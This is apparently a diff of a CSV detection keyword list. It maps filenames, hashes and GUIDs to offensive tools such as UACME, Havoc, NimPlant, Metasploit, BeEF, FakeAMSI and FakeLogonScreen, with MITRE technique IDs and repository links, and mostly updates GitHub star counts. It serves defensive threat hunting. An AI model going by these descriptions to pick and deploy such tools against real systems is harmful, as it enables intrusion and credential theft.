TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5486","1277","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" -"*f3900a5064d5ec0c58e1da8f1a83b1cd84bab30ac4d79737cd74ada3803de0f8*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5486","1277","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" 
+"*f243a7dcea8584d55890ae0b2e01c1137b923ae6ea9bdd8ae97c14f9da79b788*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*f3900a5064d5ec0c58e1da8f1a83b1cd84bab30ac4d79737cd74ada3803de0f8*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" "*F3C62326-E221-4481-AC57-EF7F76AAF27B*","offensive_tool_keyword","GithubC2","Github as C2","T1095 - T1071.001","TA0011","N/A","N/A","C2","https://github.com/TheD1rkMtr/GithubC2","1","0","N/A","10","10","115","29","2023-08-02T02:26:05Z","2023-02-15T00:50:59Z" -"*f4081a8e30f75d46.js*","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","641","85","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z" -"*f41690990d738d243f75d60ffe7a585027c0b379735b7d9d6df9cba7c7ad4c2c*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5486","1277","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" -"*f5a45c4aa478a7ba9b44654a929bddc2f6453cd8d6f37cd893dda47220ad9870*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - 
T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","0","N/A","10","10","4893","746","2023-10-03T23:32:31Z","2022-09-11T13:21:16Z" +"*f4081a8e30f75d46.js*","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","643","86","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z" +"*f41690990d738d243f75d60ffe7a585027c0b379735b7d9d6df9cba7c7ad4c2c*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*f5a45c4aa478a7ba9b44654a929bddc2f6453cd8d6f37cd893dda47220ad9870*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","0","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z" "*F5BIG-Scanner.py*","offensive_tool_keyword","POC","exploit code for F5-Big-IP (CVE-2020-5902)","T1210","TA0008","N/A","N/A","Exploitation tools","https://github.com/jiansiting/CVE-2020-5902","1","0","N/A","N/A","1","6","5","2020-07-07T02:03:40Z","2020-07-07T02:03:39Z" -"*f648515a31961e39a4395e42689b3fba1f86e0b4a724361c4ea383f50098556c*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation 
tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5486","1277","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" -"*f66280e29c2116d4b83f2c6899d8caf432f7a4d1ccc4e4cf4e72b05d0fbd1f25*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5486","1277","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" -"*f81c975acd016c97776dd3a8e3218e148682b0336ff3fcd77fad6d9b86ddf107*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5486","1277","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*f648515a31961e39a4395e42689b3fba1f86e0b4a724361c4ea383f50098556c*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*f66280e29c2116d4b83f2c6899d8caf432f7a4d1ccc4e4cf4e72b05d0fbd1f25*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*f81c975acd016c97776dd3a8e3218e148682b0336ff3fcd77fad6d9b86ddf107*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation 
tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" "*F8E0A09D99FF46019C0C3F2B725E9887D9AE53CB7FAD0BB233BC8612C2CA51F2*","offensive_tool_keyword","ADACLScanner","A tool with GUI used to create reports of access control lists (DACLs) and system access control lists (SACLs) in Active Directory .","T1222 - T1069 - T1018","TA0002 - TA0007 - TA0043","N/A","N/A","AD Enumeration","https://github.com/canix1/ADACLScanner","1","0","N/A","7","9","809","151","2023-09-12T21:35:21Z","2017-04-06T12:28:37Z" -"*f8e6a0be357726bee35c7247b57408b54bb38d94e8324a6bb84b91c462b2be30*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5486","1277","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*f8e6a0be357726bee35c7247b57408b54bb38d94e8324a6bb84b91c462b2be30*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" "*FA0DAF13-5058-4382-AE07-65E44AFB5592*","offensive_tool_keyword","ContainYourself","Abuses the Windows containers framework to bypass EDRs.","T1562 - T1562.004 - T1212 - T1212.002 - T1055 - T1055.015","TA0005","N/A","N/A","Defense Evasion","https://github.com/deepinstinct/ContainYourself","1","0","N/A","10","3","257","31","2023-08-31T07:26:22Z","2023-07-12T14:47:24Z" -"*fa0df73ca48d6e73c1e57b6630d09ec86f04f9a1f8cfaec88d7938b2d97403ef*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation 
tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5486","1277","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" -"*fa20d8ff56109734866c6baed5d8be316d4d24a5dbf074e0e90d7e458978de1c*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5486","1277","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" -"*Fadi002/unshackle*","offensive_tool_keyword","unshackle","Unshackle is an open-source tool to bypass Windows and Linux user passwords from a bootable USB based on Linux","T1110.004 - T1059.004 - T1070.004","TA0006 - TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/Fadi002/unshackle","1","1","N/A","10","10","1482","83","2023-09-23T15:54:14Z","2023-07-19T22:30:28Z" +"*fa0df73ca48d6e73c1e57b6630d09ec86f04f9a1f8cfaec88d7938b2d97403ef*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*fa20d8ff56109734866c6baed5d8be316d4d24a5dbf074e0e90d7e458978de1c*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*Fadi002/unshackle*","offensive_tool_keyword","unshackle","Unshackle is an open-source tool to bypass Windows and Linux user passwords from a bootable USB based on Linux","T1110.004 - T1059.004 - T1070.004","TA0006 - TA0002 - TA0005","N/A","N/A","Defense 
Evasion","https://github.com/Fadi002/unshackle","1","1","N/A","10","10","1485","84","2023-09-23T15:54:14Z","2023-07-19T22:30:28Z" "*Fake Computer Objects Honey Pots*","offensive_tool_keyword","HoneypotBuster","Microsoft PowerShell module designed for red teams that can be used to find honeypots and honeytokens in the network or at the host","T1083 - T1059.001 - T1112","TA0007 - TA0002","N/A","N/A","Lateral Movement","https://github.com/JavelinNetworks/HoneypotBuster","1","0","N/A","8","3","270","60","2017-12-05T13:03:11Z","2017-07-22T15:40:44Z" "*Fake Service Accounts Honey Tokens*","offensive_tool_keyword","HoneypotBuster","Microsoft PowerShell module designed for red teams that can be used to find honeypots and honeytokens in the network or at the host","T1083 - T1059.001 - T1112","TA0007 - TA0002","N/A","N/A","Lateral Movement","https://github.com/JavelinNetworks/HoneypotBuster","1","0","N/A","8","3","270","60","2017-12-05T13:03:11Z","2017-07-22T15:40:44Z" "*fake_ap.py*","offensive_tool_keyword","Rudrastra","Make a Fake wireless access point aka Evil Twin","T1491 - T1090.004 - T1557.001","TA0040 - TA0011 - TA0002","N/A","N/A","Sniffing & Spoofing","https://github.com/SxNade/Rudrastra","1","1","N/A","8","1","46","21","2023-04-22T15:10:42Z","2020-11-05T09:38:15Z" -"*fake_common_roots.txt*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*fake_default_wordlist.txt*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*fake_evernote_clipper*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. 
It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8794","2027","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" -"*fake_flash_update*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","0","N/A","N/A","10","8794","2027","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" -"*fake_lastpass/*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8794","2027","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" -"*fake_notification_ff/*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8794","2027","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" -"*FakeAMSI.c*","offensive_tool_keyword","FakeAMSI","Technically. AMSI is a set of DLLs being asked for a buffer evaluation (saying it's safe/unsafe). It means. processes (such as powershell.exe) load such DLLs when want to use AMSI. And it sounds like perfect opportunity to misuse such DLL as a method of persistence","T1117 - T1027","TA0003 ","N/A","N/A","Persistence","https://github.com/gtworek/PSBits/tree/master/FakeAMSI","1","1","N/A","N/A","10","2669","471","2023-09-28T06:10:58Z","2019-06-29T13:22:36Z" -"*FakeAMSI.dll*","offensive_tool_keyword","FakeAMSI","Technically. 
AMSI is a set of DLLs being asked for a buffer evaluation (saying it's safe/unsafe). It means. processes (such as powershell.exe) load such DLLs when want to use AMSI. And it sounds like perfect opportunity to misuse such DLL as a method of persistence","T1117 - T1027","TA0003 ","N/A","N/A","Persistence","https://github.com/gtworek/PSBits/tree/master/FakeAMSI","1","1","N/A","N/A","10","2669","471","2023-09-28T06:10:58Z","2019-06-29T13:22:36Z" -"*FakeAMSI.exe*","offensive_tool_keyword","FakeAMSI","Technically. AMSI is a set of DLLs being asked for a buffer evaluation (saying it's safe/unsafe). It means. processes (such as powershell.exe) load such DLLs when want to use AMSI. And it sounds like perfect opportunity to misuse such DLL as a method of persistence","T1117 - T1027","TA0003 ","N/A","N/A","Persistence","https://github.com/gtworek/PSBits/tree/master/FakeAMSI","1","1","N/A","N/A","10","2669","471","2023-09-28T06:10:58Z","2019-06-29T13:22:36Z" -"*FakeCmdLine.*","offensive_tool_keyword","FakeCmdLine","Simple demonstration (C source code and compiled .exe) of a less-known (but documented) behavior of CreateProcess() function. Effectively you can put any string into the child process Command Line field.","T1059 - T1036","TA0003","N/A","N/A","Defense Evasion","https://github.com/gtworek/PSBits/tree/master/FakeCmdLine","1","1","N/A","N/A","10","2669","471","2023-09-28T06:10:58Z","2019-06-29T13:22:36Z" -"*FakeDriver.java*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. 
By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*FakeDriver2.java*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*fake_common_roots.txt*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. 
and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*fake_default_wordlist.txt*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*fake_evernote_clipper*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. 
It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" +"*fake_flash_update*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","0","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" +"*fake_lastpass/*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" +"*fake_notification_ff/*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" +"*FakeAMSI.c*","offensive_tool_keyword","FakeAMSI","Technically. AMSI is a set of DLLs being asked for a buffer evaluation (saying it's safe/unsafe). It means. processes (such as powershell.exe) load such DLLs when want to use AMSI. And it sounds like perfect opportunity to misuse such DLL as a method of persistence","T1117 - T1027","TA0003 ","N/A","N/A","Persistence","https://github.com/gtworek/PSBits/tree/master/FakeAMSI","1","1","N/A","N/A","10","2670","471","2023-09-28T06:10:58Z","2019-06-29T13:22:36Z" +"*FakeAMSI.dll*","offensive_tool_keyword","FakeAMSI","Technically. 
AMSI is a set of DLLs being asked for a buffer evaluation (saying it's safe/unsafe). It means. processes (such as powershell.exe) load such DLLs when want to use AMSI. And it sounds like perfect opportunity to misuse such DLL as a method of persistence","T1117 - T1027","TA0003 ","N/A","N/A","Persistence","https://github.com/gtworek/PSBits/tree/master/FakeAMSI","1","1","N/A","N/A","10","2670","471","2023-09-28T06:10:58Z","2019-06-29T13:22:36Z" +"*FakeAMSI.exe*","offensive_tool_keyword","FakeAMSI","Technically. AMSI is a set of DLLs being asked for a buffer evaluation (saying it's safe/unsafe). It means. processes (such as powershell.exe) load such DLLs when want to use AMSI. And it sounds like perfect opportunity to misuse such DLL as a method of persistence","T1117 - T1027","TA0003 ","N/A","N/A","Persistence","https://github.com/gtworek/PSBits/tree/master/FakeAMSI","1","1","N/A","N/A","10","2670","471","2023-09-28T06:10:58Z","2019-06-29T13:22:36Z" +"*FakeCmdLine.*","offensive_tool_keyword","FakeCmdLine","Simple demonstration (C source code and compiled .exe) of a less-known (but documented) behavior of CreateProcess() function. Effectively you can put any string into the child process Command Line field.","T1059 - T1036","TA0003","N/A","N/A","Defense Evasion","https://github.com/gtworek/PSBits/tree/master/FakeCmdLine","1","1","N/A","N/A","10","2670","471","2023-09-28T06:10:58Z","2019-06-29T13:22:36Z" +"*FakeDriver.java*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. 
By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*FakeDriver2.java*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*fakefuse.c*","offensive_tool_keyword","POC","This repo contains demo exploits for CVE-2022-0185","T1210 - T1222 - T1506 - T1068","TA0002 - TA0007 - TA0040","N/A","N/A","Exploitation tools","https://github.com/Crusaders-of-Rust/CVE-2022-0185","1","0","N/A","N/A","4","364","55","2022-04-25T04:11:33Z","2022-01-19T06:19:38Z" "*fakefuse.h*","offensive_tool_keyword","POC","This repo contains demo exploits for CVE-2022-0185","T1210 - T1222 - T1506 - T1068","TA0002 - TA0007 - TA0040","N/A","N/A","Exploitation tools","https://github.com/Crusaders-of-Rust/CVE-2022-0185","1","0","N/A","N/A","4","364","55","2022-04-25T04:11:33Z","2022-01-19T06:19:38Z" "*FakeImageExploiter*","offensive_tool_keyword","FakeImageExploiter","This module takes one existing image.jpg and one payload.ps1 (input by user) and builds a new payload (agent.jpg.exe) that if executed it will trigger the download of the 2 previous files stored into apache2 (image.jpg + payload.ps1) and execute them.","T1564 - T1218 - T1204 - T1558.001","TA0002 - TA0008 - TA0010","N/A","N/A","Phishing","https://github.com/r00t-3xp10it/FakeImageExploiter","1","1","N/A","N/A","9","843","356","2019-12-06T20:59:26Z","2017-04-04T20:53:47Z" 
@@ -10207,9 +10358,9 @@ "*FakeLogonScreen.csproj*","offensive_tool_keyword","fakelogonscreen","FakeLogonScreen is a utility to fake the Windows logon screen in order to obtain the user password. The password entered is validated against the Active Directory or local machine to make sure it is correct and is then displayed to the console or saved to disk","T1110 - T1141 - T1078 - T1552","TA0001 - TA0002 - TA0003 - TA0004","N/A","N/A","Credential Access","https://github.com/bitsadmin/fakelogonscreen","1","1","N/A","N/A","10","1225","230","2020-02-03T23:28:01Z","2020-02-01T18:51:35Z" "*fakelogonscreen.exe*","offensive_tool_keyword","fakelogonscreen","FakeLogonScreen is a utility to fake the Windows logon screen in order to obtain the user password. The password entered is validated against the Active Directory or local machine to make sure it is correct and is then displayed to the console or saved to disk","T1110 - T1141 - T1078 - T1552","TA0001 - TA0002 - TA0003 - TA0004","N/A","N/A","Credential Access","https://github.com/bitsadmin/fakelogonscreen","1","1","N/A","N/A","10","1225","230","2020-02-03T23:28:01Z","2020-02-01T18:51:35Z" "*FakeLogonScreen.sln*","offensive_tool_keyword","fakelogonscreen","FakeLogonScreen is a utility to fake the Windows logon screen in order to obtain the user password. 
The password entered is validated against the Active Directory or local machine to make sure it is correct and is then displayed to the console or saved to disk","T1110 - T1141 - T1078 - T1552","TA0001 - TA0002 - TA0003 - TA0004","N/A","N/A","Credential Access","https://github.com/bitsadmin/fakelogonscreen","1","1","N/A","N/A","10","1225","230","2020-02-03T23:28:01Z","2020-02-01T18:51:35Z" -"*fakepath31337*","offensive_tool_keyword","ysoserial.net","Deserialization payload generator for a variety of .NET formatters","T1059.007 - T1027.002 - T1059.001","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/pwntester/ysoserial.net","1","1","N/A","10","10","2723","442","2023-06-27T12:08:11Z","2017-09-18T17:48:08Z" +"*fakepath31337*","offensive_tool_keyword","ysoserial.net","Deserialization payload generator for a variety of .NET formatters","T1059.007 - T1027.002 - T1059.001","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/pwntester/ysoserial.net","1","1","N/A","10","10","2726","442","2023-06-27T12:08:11Z","2017-09-18T17:48:08Z" "*FakePPID.*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" -"*fake-sms-main*","offensive_tool_keyword","fake-sms","A simple command line tool using which you can skip phone number based SMS verification by using a temporary phone number that acts like a proxy.","T1598.003 - T1514","TA0003 - TA0009","N/A","N/A","Defense 
